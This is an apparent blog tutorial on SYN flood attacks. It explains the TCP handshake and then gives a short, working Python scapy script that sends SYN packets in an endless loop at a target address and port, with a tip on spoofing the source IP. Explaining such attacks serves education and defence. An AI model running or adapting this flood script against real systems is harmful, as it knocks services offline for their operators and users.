SYN Flood Attack
Grzegorz Piechnik
Posted on December 3, 2023
Despite the passage of time, some forms of attacks do not change, only their form is slightly modified. One of the simplest attacks that can be used in various ways is the SYN flood attack. In this regard, let's zoom in a bit on its image.
What is a SYN flood attack?
To illustrate this, let's recall how the TCP protocol works.
TCP A TCP B
1. CLOSED LISTEN
2. SYN-SENT --> <SEQ=100><CTL=SYN> --> SYN-RECEIVED
3. ESTABLISHED <-- <SEQ=300><ACK=101><CTL=SYN,ACK> <-- SYN-RECEIVED
4. ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK> --> ESTABLISHED
5. ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK><DATA> --> ESTABLISHED
What we need to know about this TCP communication is that the client (TCP A) sends a request to establish a connection, sending a SYN
message to the server (TCP B). To this the server responds with a SYN-ACK
message, and the client again sends a message — this time ACK
. In this way, a connection is established. Here we also get to the heart of the matter.
In a SYN flood attack, the attacker sends SYN
packets one by one (it also often happens to different network ports). In this way, the server responds to each connection attempt with a SYN-ACK
packet, with the ultimate goal of overloading and blocking the server's services.
Construction of the script
To begin with, let's look at a simple script prepared in Python.
from scapy.all import *
target_ip = "127.0.0.1"
target_port = 80
ip = IP(dst = target_ip)
tcp = TCP(sport = RandShort(), dport = target_port, flags = "S")
raw = Raw(b"X"*1024)
p = ip / tcp / raw
send(p, loop = 1, verbose = 0)
First, we initialize a variable holding the ip and port of the attacked machine. Then we create a packet whose destination address is the address of the attacked server (IP(dst = target_ip)
). At this point it is worth mentioning that if we wanted to spoof the IP address of the opening connection, we can specify the optional parameter src
to in the creation of an instance of the IP
class. In the following lines (TCP(sport = RandShort(), dport = target_port, flags = "S")
) we create a SYN
packet with a random source port and a destination port as target_port
. It remains to create data (variable raw
), create layers (ip / tcp / raw
) and send the constructed packet in a loop. At best, the server will stop responding.
Sources
https://pl.wikipedia.org/wiki/SYN_flood
https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/
Posted on December 3, 2023
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.